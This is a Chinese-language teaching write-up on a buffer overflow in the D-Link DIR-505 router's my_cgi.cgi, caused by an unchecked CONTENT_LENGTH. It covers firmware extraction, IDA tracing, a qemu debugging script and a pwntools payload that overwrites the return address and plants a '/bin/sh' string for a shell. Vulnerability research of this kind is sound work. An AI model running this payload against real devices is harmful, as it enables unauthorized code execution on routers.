D-Link DIR-505便携路由器越界漏洞分析教学文档<\/h1>

一、文件系统提取方法<\/h2>

1. 使用dd命令提取固件<\/h3>
dd if<\/span>=<\/span>DIR505A1_FW108B10.bin skip=<\/span>1048660<\/span> bs=<\/span>1<\/span> of=<\/span>dir505.sfs
<\/span><\/span><\/code><\/pre>
if<\/code>: 输入文件<\/li>
of<\/code>: 输出文件<\/li>
bs<\/code>: 块大小设置为1字节<\/li>
skip<\/code>: 跳过固件二进制映像中特定地址的指针<\/li>
<\/ul>
2. 尝试解压Squashfs文件系统<\/h3>
提取后得到dir505.sfs<\/code>文件，使用unsquashfs<\/code>工具解压：<\/p>
unsquashfs dir505.sfs
<\/span><\/span><\/code><\/pre>解压失败原因：文件内容结尾填充了其他数据，导致解压失败。<\/p>
二、漏洞分析流程<\/h2>
1. 查找溢出参数<\/h3>

通过逆向分析寻找可能导致溢出的输入参数<\/li>
<\/ul>
2. 交叉引用分析<\/h3>

使用IDA的交叉引用功能(Xref)找到引用关键字符串的函数<\/li>
重点关注get_input_entries<\/code>函数<\/li>
<\/ul>
3. 图形化分析函数流程<\/h3>

切换到IDA的graph overview模式<\/li>
分析get_input_entries<\/code>函数的整体控制流<\/li>
<\/ul>
4. 参数来源追踪<\/h3>
关键点：<\/p>

参数来源可能在本函数内，也可能来自传入参数<\/li>
需要回溯函数调用链追踪参数源头<\/li>
查看引用get_input_entries<\/code>函数的上级函数<\/li>
<\/ul>
5. 漏洞点分析<\/h3>
发现关键问题：<\/p>

循环次数未做限制，导致可利用的溢出点<\/li>
跟踪过程：
get_input_entries(s0, s2)
s0 -> sp-0x74920[477450]
s2 -> v0=strtol(v0,0,10)
v0 -> getenv("CONTENT_LENGTH")返回值
s2 -> strtol(getenv("CONTENT_LENGTH"),0,10)
<\/code><\/pre>
<\/li>
<\/ul>
三、动态调试验证<\/h2>
1. 调试脚本<\/h3>
#!\/bin\/bash
<\/span><\/span><\/span><\/span># 待执行命令<\/span>
<\/span><\/span>INPUT=<\/span>`<\/span>python -c "print 'storage_path='+'B'*477472+'A'*4"<\/span>`<\/span>
<\/span><\/span>LEN=<\/span>$(<\/span>echo -n "<\/span>$INPUT"<\/span> | wc -c)<\/span> # 参数1的长度<\/span>
<\/span><\/span>PORT=<\/span>"1234"<\/span> # 监听的调试端口<\/span>
<\/span><\/span>
<\/span><\/span># 用法检查<\/span>
<\/span><\/span>if<\/span> [<\/span> "<\/span>$LEN"<\/span> ==<\/span> "0"<\/span> -o "<\/span>$INPUT"<\/span> ==<\/span> "-h"<\/span> -o "<\/span>$UID"<\/span> !=<\/span> "0"<\/span> ]<\/span>; then<\/span>
<\/span><\/span>  echo -e "\nUsage: sudo <\/span>$0 \n"<\/span>
<\/span><\/span>  exit 1<\/span>
<\/span><\/span>fi<\/span>
<\/span><\/span>
<\/span><\/span># 设置调试环境<\/span>
<\/span><\/span>cp $(<\/span>which qemu-mips-static)<\/span> .\/qemu
<\/span><\/span>echo "<\/span>$INPUT"<\/span> | chroot . .\/qemu -E CONTENT_LENGTH=<\/span>$LEN \
<\/span><\/span><\/span><\/span>  -E CONTENT_TYPE=<\/span>"multipart\/formdata"<\/span> \
<\/span><\/span><\/span><\/span>  -E SCRIPT_NAME=<\/span>"common"<\/span> \
<\/span><\/span><\/span><\/span>  -E REQUEST_METHOD=<\/span>"POST"<\/span> \
<\/span><\/span><\/span><\/span>  -E REQUEST_URI=<\/span>"\/my_cgi.cgi"<\/span> \
<\/span><\/span><\/span><\/span>  -E REMOTE_ADDR=<\/span>"127.0.0.1"<\/span> \
<\/span><\/span><\/span><\/span>  -g $PORT \/usr\/bin\/my_cgi.cgi
<\/span><\/span>
<\/span><\/span>echo 'run ok'<\/span>
<\/span><\/span>rm -f .\/qemu
<\/span><\/span><\/code><\/pre>注意：CONTENT_TYPE="multipart\/formdata"<\/code>中少了横线"-"，这是为了能正确在get_input_entries<\/code>函数中断下。<\/p>
2. 调试设置<\/h3>

在get_input_entries<\/code>函数设置断点<\/li>
验证确实控制了返回地址(RA)的值<\/li>
<\/ul>
四、漏洞利用开发<\/h2>
1. ROP链构造<\/h3>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>context.<\/span>endian=<\/span>"big"<\/span>
<\/span><\/span>context.<\/span>arch=<\/span>"mips"<\/span>
<\/span><\/span>
<\/span><\/span>payload =<\/span> "storage_path="<\/span>
<\/span><\/span>payload +=<\/span> "a"<\/span> *<\/span> 0x7490a<\/span>
<\/span><\/span>payload +=<\/span> "b"<\/span> *<\/span> 0x16<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00404EA0<\/span>)  # 覆盖返回地址<\/span>
<\/span><\/span>payload +=<\/span> "c"<\/span> *<\/span> 0x8C<\/span>
<\/span><\/span>payload +=<\/span> "\/bin\/sh<\/span>\x00<\/span>"<\/span>    # 放置"\/bin\/sh"字符串<\/span>
<\/span><\/span>
<\/span><\/span>with<\/span> open("payload"<\/span>,'wb'<\/span>) as<\/span> f:
<\/span><\/span>    f.<\/span>write(payload)
<\/span><\/span>f.<\/span>close()
<\/span><\/span><\/code><\/pre>五、关键分析技巧总结<\/h2>

逆向分析基础<\/strong>：必须掌握如何根据汇编代码回溯数据来源<\/li>
输入点定位<\/strong>：找到漏洞输入点是分析工作的核心<\/li>
参数追踪<\/strong>：需要耐心跟踪参数传递链，包括：

函数内部变量<\/li>
传入参数<\/li>
环境变量(如CONTENT_LENGTH)<\/li>
<\/ul>
<\/li>
动态验证<\/strong>：静态分析后必须通过动态调试确认漏洞<\/li>
利用开发<\/strong>：注意MIPS架构的特殊性(大端序)和路由器环境的限制<\/li>
<\/ol>
六、补充说明<\/h2>

环境变量控制<\/strong>：通过qemu的-E参数设置环境变量模拟HTTP请求<\/li>
调试技巧<\/strong>：

使用chroot创建隔离环境<\/li>
需要root权限运行调试脚本<\/li>
注意qemu必须使用static版本<\/li>
<\/ul>
<\/li>
漏洞本质<\/strong>：未对CONTENT_LENGTH进行有效验证导致缓冲区溢出<\/li>
<\/ol>